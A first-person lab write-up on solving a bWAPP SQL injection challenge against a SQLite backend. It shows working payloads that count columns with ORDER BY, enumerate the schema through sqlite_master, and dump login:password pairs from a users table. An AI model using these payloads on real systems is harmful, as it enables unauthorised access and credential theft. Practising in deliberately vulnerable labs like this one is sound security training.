Hi again. Today I have decided to document yet another unpublished challenge presented in bWAPP. This challenge concerns SQL Injection while the server uses the SQLite engine.
I will try to make this post relatively short, explaining the following:
- Getting To Know Our Target
- Finding Database Information (tables/columns/sqlite version)
- Extracting Database Information
- Last Words
Getting To Know Our Target
On this section of this thread, I want to spend some time talking about finding the SQL Injection vulnerability that exists and also some prep work that has to be done to get to our working injection.
This challenge has a very similar layout as the previous bWAPP challenge I posted; it allow users to search for movies titles. The vulnerability in itself is not difficult to find. Placing an apostrophe in the search string will induce an error:
The page reveals a vague “Error: HY000” error message. I spent a few moments searching on Google for relevant results, but the information I was coming across not very useful. I am fairly confident in exploiting SQLi vulnerabilities, so I approached this challenge as I normally would.
The first step I took was to find out how many columns existed in the table that used in my query. The only problem with this error message is that it was not very informative in any way. I knew that any syntax error or incorrect information that I sent was going to produce this error. Using ORDER BY helped me get one step closer to the solution.
iron’ order by 300– <– Error: HY000
iron' order by 1– <– No error
I knew this was the path to exploitation and that my thoughts were on the right track. Few instances later, I discovered that there were 6 columns.
This was the preparation I required before I could proceed discovering more information about the database. This will be the transition to our next topic.
Finding Database Information (tables/columns/sqlite version)
Before I started to inject this web page, I knew what kind of information I was looking for. The issue was, I was not familiar with SQLite syntax. After looking at some SQLite documentation, I gathered enough information to know how to concatenate strings, find the SQLite version, and obtaining the tables and columns.
The following injections demonstrate the aforementioned concepts, thus completing the challenge.
Finding SQLite version:
Finding database tables:
'union+select+1,2,name,4,5,6 from sqlite_master--+-
This next injection will demonstrate how to retrieve the DDL statements used when creating the tables for the database. This will effectively reveal the tables and columns. The injection follows:
'union+select+1,2,sql,4,5,6 from sqlite_master--+-
The above image depicts the information needed; the login and password columns for the users table.
Extracting the login and password from the users table:
union+select+1,2,login||":"||password,4,5,6 from users--+-
SQLite uses “||” as the operator to concatenate strings together. In this case, we are joining the login and password with a colon.
This concludes this thread. As always, I really hope that you can take something from this reading. Although SQLite is not as popular as other RDBMSs, information disclosure can still be achieved via SQL injection.